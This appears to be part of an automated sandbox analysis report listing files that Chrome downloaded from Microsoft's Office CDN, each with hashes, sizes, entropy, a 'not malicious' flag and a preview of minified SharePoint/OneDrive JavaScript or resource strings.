                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[19,176,584,1610],{2194:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return i}});var a,i={queued:0,started:1,completed:2,aborted:3,failed:4,none:5};!function(e){e[e.none=0]="none",e[e.other=1]="other",e[e.general=2]="general",e[e.conflict=3]="conflict",e[e.similarNameExists=4]="similarNameExists",e[e.invalidName=5]="invalidName",e[e.fileSize=6]="fileSize",e[e.emptyFileOrFolder=7]="emptyFileOrFolder",e[e.emptyFileOrFolderForDocLib=8]="emptyFileOrFolderForDocLib",e[e.overQuota=9]="overQuota",e[e.accessDenied=10]="accessDenied",e[e.lockMismatch=11]="lockMismatch",e[e.overQuotaSharedFolder=12]="overQuotaSharedFolder",e[e.folderUploadNotSupported=13]="folderUploadNotSupported",e[e.versionMismatch=14]="versionMismatch",e[e.authFailure=15]="authFailure",e[e.fileHashMismatch=16]="fileHashMismatch",e[e.targetFolderMissing=17]="targetFolderMissing",e[e.itemNotFound=18]="itemNotFound",e[e.malwareDetected=19
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (13561)
                              Category:downloaded
                              Size (bytes):596823
                              Entropy (8bit):5.491102016516151
                              Encrypted:false
                              SSDEEP:
                              MD5:CB777E8062E555514B713F52EA9A329E
                              SHA1:7CF2E8796E5164BC0CE6ABAB53B601D9BDA5D42F
                              SHA-256:26225FDFC35DDD6645285F2316F13E204B317A0986FD0979C74406D694500E13
                              SHA-512:FDD2C0C7B22AFED6745D30B92E2671814A1150DF246D17170A852E5DEE68B5ACD661D9AC50D8264A3EF25292D26D800D7D4EDC6AADC1D4403C21412DA10220F9
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/listsenterprise.js
                              Preview:/*! For license information please see listsenterprise.js.LICENSE.txt */.var __webpack_result__;(()=>{var e=[,,(e,t,n)=>{"use strict";n.d(t,{$:()=>C,$b:()=>te,A:()=>at,Ab:()=>Ie,B:()=>dt,Bb:()=>_t,C:()=>ve,Cb:()=>A,D:()=>fe,Db:()=>Te,E:()=>me,Eb:()=>_e,F:()=>ee,Fb:()=>Z,G:()=>Je,Gb:()=>ct,H:()=>re,Hb:()=>Y,I:()=>y,Ib:()=>pe,J:()=>_,Jb:()=>U,K:()=>he,Kb:()=>de,L:()=>j,Lb:()=>u,M:()=>q,Mb:()=>ze,N:()=>Ce,Nb:()=>Ze,O:()=>J,Ob:()=>Se,P:()=>K,Pb:()=>ue,Q:()=>M,Qb:()=>je,R:()=>ge,Rb:()=>s,S:()=>G,Sb:()=>c,T:()=>le,Tb:()=>F,U:()=>Ke,Ub:()=>De,V:()=>qe,Vb:()=>o,W:()=>T,Wb:()=>S,X:()=>D,Xb:()=>L,Y:()=>i,Yb:()=>We,Z:()=>k,Zb:()=>bt,_:()=>x,_b:()=>ie,a:()=>H,ab:()=>Pe,ac:()=>v,b:()=>He,bb:()=>gt,c:()=>$e,cb:()=>p,cc:()=>b,d:()=>W,db:()=>N,dc:()=>Qe,e:()=>r,eb:()=>ht,ec:()=>et,f:()=>X,fb:()=>g,fc:()=>ae,g:()=>pt,gb:()=>Ue,h:()=>w,hb:()=>$,i:()=>tt,ib:()=>E,ic:()=>Q,j:()=>f,jb:()=>mt,k:()=>B,kb:()=>xe,l:()=>ot,lb:()=>we,lc:()=>Ge,m:()=>ft,mb:()=>ut,mc:()=>ke,n:()=>st,nb:()=>O,nc:()=>se,o:()=>it,ob:
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (13295)
                              Category:downloaded
                              Size (bytes):628392
                              Entropy (8bit):5.08791403486684
                              Encrypted:false
                              SSDEEP:
                              MD5:790051838E13E8E3AA3ED01594066705
                              SHA1:1AEFE6BAAAD346E59858D0128214F5D0FD56783B
                              SHA-256:8A83E536035FD075201281689191B686A18AE2865FE7E16EB144D360299EA2F9
                              SHA-512:8CDD345402B1C2755C073AF3B583BD95972DEF845EBD1F9AE94C89C391882FA9C0A5258C7BA0C9DC5B07E7DF53E3B8CCCEF2AF90C1DDFB6B5CB7AF77D4BD4D1A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-meta-os/de/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6473:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7237:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (2716)
                              Category:downloaded
                              Size (bytes):13972
                              Entropy (8bit):5.183569569053349
                              Encrypted:false
                              SSDEEP:
                              MD5:FCAF131D76D8A39ED304370017D08E12
                              SHA1:402DB6DFD65E6535DB927167C517A57F17DC34C5
                              SHA-256:3C837E50FECF50F27D3288C5F9B32EE52341CBBD48142281233D6B1103E636C6
                              SHA-512:B4AA76B6DCC329BBD1B6747CD7EED3CB3719EA2575FABE5674A3A58DE4E10F92E4D981DB17DBE06D27593B85D2C2CEEFBA1C71232EC7F763F408518E679FB5CA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/de/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{534:e=>{e.exports=JSON.parse('{"a":"Ein Problem ist aufgetreten","c":"Versuchen Sie, die Seite zu aktualisieren.","b":"Es ist ein Problem aufgetreten, und wir konnten die anzuzeigende Seite nicht abrufen."}')}.,297:e=>{e.exports=JSON.parse('{"b":"Nur verf.gbar, wenn online","a":"{0}. Deaktiviert im Offlinemodus"}')}.,536:e=>{e.exports=JSON.parse('{"a":"Korrelations-ID: {0}","b":"Internet getrennt."}')}.,468:e=>{e.exports=JSON.parse('{"NONE":"Keine","SUM":"Summe","COUNT":"Anzahl","AVG":"Durchschnitt","MAX":"Maximum","MIN":"Minimum","STDEV":"Standardabweichung","VAR":"Varianz"}')}.,466:e=>{e.exports=JSON.parse('{"b":"Ja","a":"Nein"}')}.,277:e=>{e.exports=JSON.parse('{"a":"Dateien, die Ihre Aufmerksamkeit erfordern","b":"Elemente, die Ihre Aufmerksamkeit erfordern","h":"Seiten, die Ihre Aufmerksamkeit erfordern","g":"Fehlende Informationen","d":"{0} Feld fehlt.||{0} Felder fehlen.","c":"1||2-",
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (7328)
                              Category:downloaded
                              Size (bytes):64802
                              Entropy (8bit):5.3471256229096165
                              Encrypted:false
                              SSDEEP:
                              MD5:870FBA25236CEBF6003185CCF4044269
                              SHA1:64C4279A9A9C750A2E5DDD0388C073DB2AED971E
                              SHA-256:B9420C00A46F516F4FB5EEBE49AAD85674323B211FD411505B07EC323D286C10
                              SHA-512:382F17C528F08BD20FF65207F0966CECD3ED81E2CD1E7DF286CB956BF868D5CD668C10E424867E4810668220A415CBCAA2AA86E7661EAC95A3A847014C143D1F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/23.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[23,81],{2314:(e,t,n)=>{n.d(t,{a:()=>d,b:()=>c});var a=n("tslib_102"),i=n("react-lib");(0,n("fui.util_150").pZ)([{rawString:".customFieldCompact_6b0520e2,.customField_6b0520e2{min-height:inherit;margin:-11px 0;white-space:normal;display:flex;flex-direction:column}.customFieldCompact_6b0520e2{margin:-6px 0}.customFieldTiles_6b0520e2{height:100%;width:100%}.ms-Tile-background .customCards_6b0520e2,.ms-Tile-background .defaultHoverCard_6b0520e2,.ms-Tile-background .fieldDefaultHoverCard_6b0520e2{pointer-events:auto}.customCards_6b0520e2 .customFieldCompact_6b0520e2,.customCards_6b0520e2 .customField_6b0520e2{margin:0}.customCards_6b0520e2 .customFieldCompact_6b0520e2{margin:0}.defaultHoverCard_6b0520e2{position:absolute;opacity:0;cursor:pointer}.fieldDefaultHoverCard_6b0520e2{padding-left:12px;position:absolute;opacity:0;cursor:pointer}"}]);var r=n("fui.lco_35"),o=n("odsp.util_578"),s=!o.HW.isActivated("e5d89a3a-
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (2613)
                              Category:downloaded
                              Size (bytes):11969
                              Entropy (8bit):5.1832816094380885
                              Encrypted:false
                              SSDEEP:
                              MD5:2A6C642C9CEBC3E71970BE33D1938606
                              SHA1:4D938DCFA7E50DD1ED02E85002FC625504D89709
                              SHA-256:0005FB9D91650F3C4B0036CDEC9093ECE07344C75E456462AC7A94DFC7971CAB
                              SHA-512:7DEA085D474DE852871C23C8A24151C7ABC1E33308D07A5094C9F7B7EC141A20E03F6A29CDB6AEA82304C4097EA03B84B0BA44C87BDFD7E0BEFC3C7A78CCFA4E
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/en-us/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{534:e=>{e.exports=JSON.parse('{"a":"Something went wrong","c":"Try refreshing the page","b":"Something went wrong and we couldn\\u0027t get the page to display."}')}.,297:e=>{e.exports=JSON.parse('{"b":"Only available when online","a":"{0}. Disabled while offline"}')}.,536:e=>{e.exports=JSON.parse('{"a":"Correlation ID: {0}","b":"Internet disconnected"}')}.,468:e=>{e.exports=JSON.parse('{"NONE":"None","SUM":"Sum","COUNT":"Count","AVG":"Average","MAX":"Maximum","MIN":"Minimum","STDEV":"Std Deviation","VAR":"Variance"}')}.,466:e=>{e.exports=JSON.parse('{"b":"Yes","a":"No"}')}.,277:e=>{e.exports=JSON.parse('{"a":"Files that need attention","b":"Items that need attention","h":"Pages that need attention","g":"Missing info","d":"{0} field missing||{0} fields missing","c":"1||2-","e":"{0} missing","f":"Required info"}')}.,554:e=>{e.exports=JSON.parse('{"a":"Provide feedback to Microsoft"}')}.,462:e=
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1520)
                              Category:downloaded
                              Size (bytes):2453
                              Entropy (8bit):5.264941127857209
                              Encrypted:false
                              SSDEEP:
                              MD5:CC841575E0274CBB663720F3B5E31DC3
                              SHA1:494EED3BE4310A14913B45043D49CE47575B79FB
                              SHA-256:BBEDEC854D4F4EC5997FA6D6A7E9A228E287182669A824655A95D3B2662CC2E5
                              SHA-512:2AE8D841CDB1E04D79C6E65F4904C6BBC1B06D0CBCDBA80AB801348852AE39779931C99CE0A97A3F2DBC50534533F091A84B858622B7EB4273ABB4D1A70478A7
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/88.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[88],{638:(e,t,n)=>{n.r(t),n.d(t,{getContextualMenuProps:()=>r});var a=n("tslib_102"),i=n(1151);function r(e,t){var n=e.commands,r=e.ref,o=e.target,s=e.styles,c=(0,a.l7)(e,["commands","ref","target","styles"]);if(n)return{items:(0,i.a)((0,a.W_)({commands:n,onGetSubCommands:t},c)),styles:s,target:o||(null==r?void 0:r.current)||void 0}}}.,1151:(e,t,n)=>{n.d(t,{a:()=>s});var a=n("tslib_102"),i=n("fui.lco_35"),r=n(127),o=n(185);function s(e){var t=this,n=e.commands,c=e.onGetSubCommands,d=e.QosEvent,l=e.EngagementEvent,u=e.CustomerPromiseEvent,f=e.foldSingleSubCommandIntoParent,p=void 0!==f&&f,m=n.map(function(e){var n=e.subCommands,f=e.getIconProps&&e.getIconProps(e)||e.iconProps,m=e.subMenuStyles,_=void 0;if(n||e.getSubCommands){var h=s({commands:n||[],onGetSubCommands:c,QosEvent:d,EngagementEvent:l});if(h&&1===h.length&&!e.getSubCommands&&p){var b=h[0];return!b.iconProps&&f&&(b=(0,a.W_)((0,a.W_)({},b),{iconProps
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 285 x 214, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):29022
                              Entropy (8bit):7.969863399463527
                              Encrypted:false
                              SSDEEP:
                              MD5:463576F3C9A8B9F92E495148EBEAA125
                              SHA1:D0D19D7D37663E589E0D62DB47777CF04407F669
                              SHA-256:A53CB0B898C72031D3497C4F637E129CF76052AA1D113B81A77E6DB7E3AC457C
                              SHA-512:3EF808DCDED10EA025ADE1E8A9F63D13107A87D207EAEB7F0768150CDAFE6FA2EC3CD98896F7C3C1C09C2B1C93AD07F937C091B567BA9C6DB55AE5476288EF43
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR..............2V.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs...%...%.IR$.....tIME......'.B....p)IDATx..wx\...}..U....U.\.n.K....B v..~....$.0...|.z7...n.p.].l..KV..2.?....bC@|..}..X..vg.=;gf.9...................."t.....E.(((.(..QPP.P4].#.@..n......~..w-......Wo.i........._...>];....vo.{.q=..{k.L........>[gBo..6Fg...5......iiia....7..N.u..9r$....!.;v,.6l@.$....i.c.!!!.E..a6.)**..p.f...f3S.L..t..'....HAA..6mb.A....PUU.U..z....1f..$Ib....v$Ib......f........b.q....z.j....5j.C..a.}455QTTDqq1.......z.j.v;....G...G]]..V.....a......~...E..3m.4l6....j.2t.P........:t......x.5j.....>|.)S.....m.8q"f....7RWW..^..``.%....h...c...l........Cnn..W.F.ATT.......v{A..<.m.6m....t.>..\......F..Ehh(...|...=z...l..K@@.eee....=.I.hjjb...8p...Z....u....!//.o........Y.b.V...JEnn.:..C..1f..t:.;v. 44.#G........g...t:.n.J[[..'Nd...........+...............l466..R.........$...X.d.........i.&....4i.....>|X.{....f&M.Dtt4+V. 66.....
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (4197)
                              Category:downloaded
                              Size (bytes):150741
                              Entropy (8bit):5.12294968387418
                              Encrypted:false
                              SSDEEP:
                              MD5:2514804FCD9AAAF492BCD9464BEB3241
                              SHA1:B93EC6FB6B6AEE06195366B7E3D9001EB406EC7D
                              SHA-256:7EC668A12A42C2F69F00F1DD56D65301C3C1821FABDC3048AD956E4CBC9143A1
                              SHA-512:51174181E504EDB45E16DF673A414E0DB756E90416C0F4D8F048B036F3A67928F862319FF2A3718BE2DF4387AD518248FEFBC979066012C415433E94EA0089BB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/fr/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{2266:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,2455:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (4085)
                              Category:downloaded
                              Size (bytes):163663
                              Entropy (8bit):5.80890519476008
                              Encrypted:false
                              SSDEEP:
                              MD5:F5F9AC87D29D163D5A2A7623A6CE89A6
                              SHA1:54409C4BD8A467751B880621E8DEFC6040534626
                              SHA-256:E2965A84F3423745CC3160F34CEAFB43F87D7B163DE5530976B76446E06003FE
                              SHA-512:32221F51FB8D72DF4C03F1DB48E624E689220C3E7D26E84FF1F1463E49B435E6669C6A3E4642E5D989D48B5A121EB90879C685B80BAE52AD901D6D76AE8EC352
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/ja/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{2266:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,2455:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (60473)
                              Category:downloaded
                              Size (bytes):550633
                              Entropy (8bit):5.422180083274253
                              Encrypted:false
                              SSDEEP:
                              MD5:A3B38355AEFCC7408D0274911ED8E748
                              SHA1:79B0566E2D4D04A7FB37A0CC8572199F840E98F0
                              SHA-256:3E223D18964E4645E143250E0DA815CC5D6F4C7DA33443B3D2AD6E1252A6D9C1
                              SHA-512:5350CC882995C2491AD54507A52860187CE5B7FB2312DC5C7139227FF0E892AEFA0A083FDC70A1A32F3696B0D9B55E31866471981B33723897DA5EE79F090A39
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/plt.teamsodbfilebrowserdataprefetch.js
                              Preview:/*! For license information please see plt.teamsodbfilebrowserdataprefetch.js.LICENSE.txt */.var __webpack_result__;(()=>{var e={211:(e,t,n)=>{"use strict";n.d(t,{a:()=>a});var a={accdb:{extensions:["accdb","mdb"]},archive:{extensions:["7z","ace","arc","arj","dmg","gz","iso","lzh","pkg","rar","sit","tgz","tar","z"]},audio:{extensions:["aif","aiff","aac","alac","amr","ape","au","awb","dct","dss","dvf","flac","gsm","m4a","m4p","mid","mmf","mp3","oga","ra","rm","wav","wma","wv"]},calendar:{extensions:["ical","icalendar","ics","ifb","vcs"]},classifier:{extensions:["classifier"]},clipchamp:{extensions:["clipchamp"]},code:{extensions:["abap","ada","adp","ahk","as","as3","asc","ascx","asm","asp","awk","bash","bash_login","bash_logout","bash_profile","bashrc","bat","bib","bsh","build","builder","c","cbl","c++","capfile","cc","cfc","cfm","cfml","cl","clj","cls","cmake","cmd","coffee","config","cpp","cpt","cpy","cs","cshtml","cson","csproj","css","ctp","cxx","d","ddl","di","disco","dml","dtd","d
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (9978)
                              Category:downloaded
                              Size (bytes):10028
                              Entropy (8bit):5.466854354735423
                              Encrypted:false
                              SSDEEP:
                              MD5:3D0A05ADDCAFBA1A7C5C473388A29CB5
                              SHA1:5E9A78A5E4C9495DFCB66BBA10B7C73A7861BCC8
                              SHA-256:A1E651C04A651360A90CAB172379129093FC423E29FDF7A80075B7EE1033C81F
                              SHA-512:346ED9EE399C5081E038986B67FBD8F2C4042AEE9BFD05E30331AE2605170E05A5C754991821F0B43042B42E48FAF66055D3CC7632D98F90E9393583E865E96D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/14.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[14],{3685:function(e,t,n){n.r(t),n.d(t,{constructGetItemContext:function(){return V},constructGetItemSetContext:function(){return B},getContentTypes:function(){return z},getFolderContentTypes:function(){return G},getItemContextPostDataContext:function(){return j},spDataSourceConfigurationFacet:function(){return s.od},spPrefetchDataConfigurationFacet:function(){return s.Md}});var a=n("tslib_102"),i=n(18),r=n(28),o=n(397),s=n(6),c=n(1431),d=n(222),l=n(3684),u=n(775),f=n(43),p=n(184),m=n(2596),_=n(692),h=n(74),b=n(20),g=n(634),v=n(45),y=n(35),S=n(36),D=n(68),I=n(756),x=n(31),C=n(8),O=n(24),w=n(81),E=n(67),A=n(92),L=n(123),k=n(1289),M=n(221),P=n(378),T=n(5),U=n(269),F=n("odsp.util_578"),H="f11ffda7-84da-4f5b-8f91-c487c2ba8a6c",R=n(2738),N=n(2737);function B(e){var t=this,o=e.itemSetKey,l=e.contentTypes,u=e.pageToken,p=e.fetchNextGroupXml,h=e.qosName,b=e.skipCache,g=void 0!==b&&b,x=e.rowLimit,C=e.applicationHeader
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2064)
                              Category:downloaded
                              Size (bytes):3928
                              Entropy (8bit):5.347702245926813
                              Encrypted:false
                              SSDEEP:
                              MD5:B07BF96357F01953102347096FC85B8C
                              SHA1:C4F9C1EC12924D181B6E284EEA74B8048243ADBD
                              SHA-256:B7378C4395F3A0E9C995B250691DD5A038B94FFB058026D3E6EFD6EDBE5186CB
                              SHA-512:81AA80DC9A094C5716B7ED5C0C0A13D2C01535458ECDBEEBBB31108A5946FF3E6AC517C86561F048366A996C72F83D63C26129276AF1A8B6EFE7F4509F7581C2
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/84.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[84,215],{1716:(e,t,n)=>{var a;n.d(t,{a:()=>o,b:()=>r}),function(e){e.Create="Create",e.Update="Update",e.Delete="Delete"}(a||(a={}));var i=["isConflict"];function r(e){var t=function(t){if(e.hasOwnProperty(t)&&!i.find(function(e){return e===t}))return{value:{key:t,value:e[t]}}};for(var n in e){var a=t(n);if("object"==typeof a)return a.value}}function o(e,t){var n=e.filter(function(e){var n;return(null===(n=r(e))||void 0===n?void 0:n.key)===t});if(n){var a=r(n[0]);if(a)return a.value}}}.,1715:(e,t,n)=>{n.d(t,{a:()=>s});var a=n("odsp.util_578"),i=n(1716),r=new RegExp('(")',"g");function o(e){return'"'.concat(e.replace(r,'""'),'"')}function s(e,t){if(e&&0!==e.length){var n=(new a.cL).isWindows?"\r\n":"\n";if(e&&0!==e.length){var r=new Set,s=e.map(function(e){if(e){var t={};return e.details.map(function(e){var n=(0,i.b)(e);n&&n.value&&""!==n.value&&(r.add(n.key),t[n.key]="".concat(n.value))}),t}}),c=Array.from(r)
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (48756)
                              Category:downloaded
                              Size (bytes):256964
                              Entropy (8bit):5.375648309794215
                              Encrypted:false
                              SSDEEP:
                              MD5:A5CAC482676DF3E5E5F7DD234F62437A
                              SHA1:ABBB264D20F6C9F8CF4E93BFF7574BB2E5B469B5
                              SHA-256:CD06EC4AD42C2DD01944717B9D7497EE202ACF248DDF5C84A52CF74BDFFE494E
                              SHA-512:EC12D0417A095F1EC7468BF7BF6AC3A7F287F5D3DEF470D57072111A821CE8EAE9F68616BE6D58E4639F41B7037A0BED239B0E81D7644C5483C6B537E3470DA3
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/254.js
                              Preview:/*! For license information please see 254.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[254],{797:(e,t,n)=>{n.d(t,{a:()=>ne});var a=n(798),i=n("react-lib"),r=n.n(i),o=n("react-dom-lib"),s={childContextTypes:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},c={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},d=Object.defineProperty,l=Object.getOwnPropertyNames,u=Object.getOwnPropertySymbols,f=Object.getOwnPropertyDescriptor,p=Object.getPrototypeOf,m=p&&p(Object),_=function e(t,n,a){if("string"!=typeof n){if(m){var i=p(n);i&&i!==m&&e(t,i,a)}var r=l(n);u&&(r=r.concat(u(n)));for(var o=0;o<r.length;++o){var _=r[o];if(!(s[_]||c[_]||a&&a[_])){var h=f(n,_);try{d(t,_,h)}catch(e){}}}return t}return t},h="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.co
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (793)
                              Category:downloaded
                              Size (bytes):798
                              Entropy (8bit):5.272286613186459
                              Encrypted:false
                              SSDEEP:
                              MD5:E939BED28164AF8E9587E03AD3084AFA
                              SHA1:97D8B8B7E462ADA26E50C53D88042466A1C29B1B
                              SHA-256:415A8F3B8610185F994979F5D7BF83C2CB5FA50FBF547B80444FF1A5EA306E0F
                              SHA-512:8731008FE89DAE83BBC1B777299D8EF7DD3B7DC9FF32122E89C90226AE074ECD04C5351F9084AEAFA11F9A735FF7BEC30565B0A93773138B43FD06EB11BE5116
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/43.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[43],{695:(e,t,n)=>{n.r(t),n.d(t,{getCanonicalUrlKey:()=>c});var a=n("odsp.util_578"),i=n(97),r=n(38),o=n(4),s=n(108),c=new a.qT({name:"GetCanonicalUrl.key",factory:{dependencies:{pageContext:o.a},create:function(e){var t=e.pageContext;return{instance:function(e){var n=t.listUrl,a=t.webAbsoluteUrl,o=new i.a(t.webAbsoluteUrl).authority,c=new r.b({context:{webAbsoluteUrl:a,listUrl:n}}).getUrlParts({path:null==e?void 0:e.FileRef,listUrl:n,webUrl:a}),d=c.fullItemUrl,l="";if(e)if((0,s.c)(e))l=d||o+e.FileRef;else{var u=d?new i.a(d):void 0,f=u?"".concat(u.authority).concat(u.segments.slice(0,-1).join("/")):void 0,p=new i.a(e.FileRef).segments.slice(0,-1).join("/");l=f||o+p}else l=c.fullListUrl||o+n;return l}}}}})}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (10420)
                              Category:downloaded
                              Size (bytes):15996
                              Entropy (8bit):5.31672317275072
                              Encrypted:false
                              SSDEEP:
                              MD5:70C47DCE4FC3268D308A616A8223AAC8
                              SHA1:6144FB98D9B64833BBDBE65FC812EC45B4CDE991
                              SHA-256:F60F2F72ED199F275D4497BBF7EF8190F199E9BE3BB73F2AFBDBD448AC42DBB7
                              SHA-512:91B6AFE1CAD248D23259E8ED0833DAD5BD87C179332C095B643BBAD1FADC3599E90D09451CCB468AB50EA9974E17D156A0C648C6E50D19215BFD1944A6513CA0
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/171.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[171],{1168:(e,t,n)=>{n.d(t,{a:()=>a,b:()=>i});var a,i={applyPanel:"filtersPane-applyInPanel",pinnedToFiltersPaneChanged:"filtersPane-pinnedToFiltersPaneChanged",showInFiltersPaneChanged:"filtersPane-showInFiltersPaneChangedChanged",sectionInfosChanged:"filtersPane-sectionInfosChanged",canvasFilterChanged:"filtersPane-canvasFilterChanged"};!function(e){e[e.none=0]="none",e[e.last3Months=1]="last3Months",e[e.last30Days=2]="last30Days",e[e.last7Days=3]="last7Days",e[e.yesterday=4]="yesterday",e[e.today=5]="today",e[e.tomorrow=6]="tomorrow",e[e.next7Days=7]="next7Days",e[e.next30Days=8]="next30Days",e[e.next3Months=9]="next3Months",e[e.nextYear=10]="nextYear"}(a||(a={}))}.,1603:(e,t,n)=>{n.d(t,{a:()=>s,b:()=>c});var a=n("odsp.util_578"),i=["Text","Note","Number","Boolean","User","DateTime","Choice","URL","Calculated","Currency","Location","Thumbnail","TaskOutcome","MMD","Lookup"],r=["Text","Choice","DateTime","No
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8985)
                              Category:downloaded
